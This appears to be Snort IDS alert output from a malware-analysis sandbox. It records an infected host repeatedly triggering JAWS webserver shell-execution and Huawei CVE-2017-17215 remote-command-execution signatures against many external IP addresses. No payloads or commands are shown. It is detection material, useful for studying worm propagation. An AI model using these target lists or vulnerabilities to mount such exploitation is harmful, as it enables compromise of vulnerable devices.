      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50922 -> 163.18.36.225:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41230 -> 23.46.137.230:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55242 -> 156.250.94.109:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53920 -> 156.232.90.210:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43316 -> 161.117.235.191:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40024 -> 144.76.38.22:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47900 -> 46.37.26.101:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56560 -> 13.226.244.149:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52300 -> 108.128.25.169:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47890 -> 20.232.83.3:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44142 -> 184.28.146.137:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57296 -> 35.173.158.111:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58590 -> 198.178.167.197:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38742 -> 44.242.89.212:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50096 -> 107.149.208.211:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37928 -> 206.237.233.113:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37692 -> 184.85.116.236:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50304 -> 144.208.124.250:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57736 -> 104.66.38.244:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42252 -> 68.178.190.18:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51170 -> 184.50.69.235:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45814 -> 88.221.43.94:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59524 -> 156.226.43.255:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51016 -> 156.241.112.202:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42424 -> 108.48.6.25:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53916 -> 197.26.60.82:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44134 -> 156.241.126.146:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47688 -> 80.15.175.210:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60946 -> 104.69.137.161:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35196 -> 107.175.78.7:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51186 -> 202.55.253.222:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51636 -> 52.218.177.241:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44326 -> 138.201.167.175:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42398 -> 81.83.10.36:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35940 -> 104.103.53.13:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39266 -> 107.149.188.132:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44562 -> 43.154.93.3:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43996 -> 20.141.100.182:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41640 -> 185.150.32.171:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:32968 -> 156.241.133.62:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55854 -> 23.234.14.245:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34028 -> 161.10.233.17:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54298 -> 173.234.127.132:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50192 -> 156.245.33.198:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52882 -> 31.14.15.19:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57470 -> 151.236.58.126:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53692 -> 34.248.28.144:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47000 -> 23.215.86.238:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58638 -> 79.112.116.168:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47628 -> 194.190.42.77:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48794 -> 18.213.74.59:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37440 -> 216.74.238.53:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42252 -> 172.121.29.144:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58316 -> 184.51.50.194:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57896 -> 104.117.231.106:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50252 -> 80.65.56.166:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48110 -> 37.13.10.141:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58806 -> 46.20.73.189:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58644 -> 151.101.116.213:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59030 -> 45.57.228.215:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52258 -> 188.94.254.143:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39380 -> 138.68.166.254:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40152 -> 86.69.169.188:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55072 -> 154.50.201.87:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58448 -> 161.49.25.8:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46124 -> 154.213.230.228:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58476 -> 220.135.29.69:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42398 -> 162.243.70.121:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47258 -> 74.206.170.153:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41524 -> 156.244.189.215:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53284 -> 197.246.248.19:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54922 -> 72.163.219.244:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51150 -> 69.192.162.71:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55870 -> 156.244.122.163:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41988 -> 62.221.199.113:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49892 -> 145.239.66.148:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50980 -> 156.250.20.105:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52512 -> 34.251.156.99:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55544 -> 143.204.54.79:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58076 -> 14.168.208.7:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53736 -> 156.254.54.179:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45514 -> 156.225.140.149:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49882 -> 156.250.15.145:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38080 -> 213.192.239.158:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56438 -> 199.232.173.212:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51872 -> 146.59.178.109:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53716 -> 197.14.165.223:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46576 -> 23.36.81.214:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39556 -> 13.213.208.188:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58434 -> 14.168.208.7:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48692 -> 51.15.156.31:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43354 -> 80.41.68.202:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54434 -> 108.21.128.241:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45206 -> 50.17.26.202:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55178 -> 156.225.150.166:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34648 -> 156.250.28.73:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51120 -> 156.235.108.8:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35326 -> 156.238.52.201:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44316 -> 164.88.173.69:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35270 -> 218.188.102.232:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35388 -> 18.184.82.136:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55948 -> 159.69.210.143:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41064 -> 114.27.144.84:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52808 -> 192.95.37.85:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45856 -> 24.194.192.225:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47836 -> 163.152.218.200:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55970 -> 13.226.97.150:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52832 -> 192.95.37.85:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44952 -> 23.211.0.245:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42784 -> 2.83.169.102:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54854 -> 198.2.241.113:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44730 -> 209.23.113.13:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36014 -> 156.225.159.48:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46340 -> 116.93.97.27:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58978 -> 104.234.14.127:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35758 -> 124.156.227.137:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40758 -> 156.250.88.95:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33072 -> 118.130.210.139:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34138 -> 156.226.74.35:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48296 -> 107.180.2.29:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45334 -> 47.180.227.7:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59112 -> 38.2.73.208:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59400 -> 104.77.222.21:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42020 -> 70.166.193.195:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35426 -> 156.225.135.232:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60724 -> 186.194.17.98:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57506 -> 156.244.76.201:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44580 -> 156.247.24.137:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59254 -> 154.206.95.217:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36934 -> 218.161.40.245:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59816 -> 88.221.24.160:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54572 -> 23.10.97.224:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51352 -> 104.88.158.5:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34428 -> 192.126.206.39:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49998 -> 54.251.166.212:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37378 -> 154.95.176.39:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53942 -> 23.11.174.142:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48884 -> 118.219.148.241:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55812 -> 142.132.170.186:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43612 -> 52.18.190.99:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41998 -> 186.7.130.151:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47906 -> 216.172.146.208:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33228 -> 118.130.210.139:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59648 -> 202.61.191.151:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60262 -> 156.244.91.69:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44858 -> 195.179.109.197:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54552 -> 181.49.134.209:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53988 -> 38.63.104.34:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36816 -> 192.243.241.146:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38198 -> 202.64.13.91:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35716 -> 35.215.234.203:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52808 -> 52.14.225.70:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53740 -> 220.88.163.69:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55196 -> 46.212.106.222:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43504 -> 104.77.159.153:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60572 -> 31.44.91.3:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49734 -> 23.230.49.94:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35484 -> 52.37.94.98:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48640 -> 104.71.187.224:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43298 -> 107.152.219.236:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37690 -> 14.50.50.108:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52014 -> 156.244.72.21:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50884 -> 216.115.245.179:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60384 -> 43.229.92.134:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34794 -> 156.241.125.155:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42282 -> 156.238.46.238:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55266 -> 54.154.216.33:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44868 -> 195.147.2.7:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60394 -> 18.231.19.230:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54552 -> 23.38.83.120:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33544 -> 118.130.210.139:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54888 -> 79.175.164.13:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41904 -> 23.192.51.221:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38954 -> 5.251.129.200:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36642 -> 23.238.159.104:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60800 -> 212.11.218.15:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40774 -> 104.65.190.109:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34986 -> 165.192.136.140:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52076 -> 156.240.108.54:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60224 -> 156.241.9.61:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46564 -> 92.205.17.246:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42328 -> 143.204.206.136:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54872 -> 54.171.175.207:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57526 -> 38.90.8.189:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56142 -> 104.82.153.101:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50430 -> 35.241.9.65:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39264 -> 134.209.180.19:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33792 -> 23.52.153.44:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48482 -> 79.172.2.234:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55220 -> 13.70.2.94:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34842 -> 45.194.179.117:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48690 -> 168.188.174.254:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55656 -> 184.86.158.86:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54876 -> 108.157.172.252:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51214 -> 23.46.233.147:80
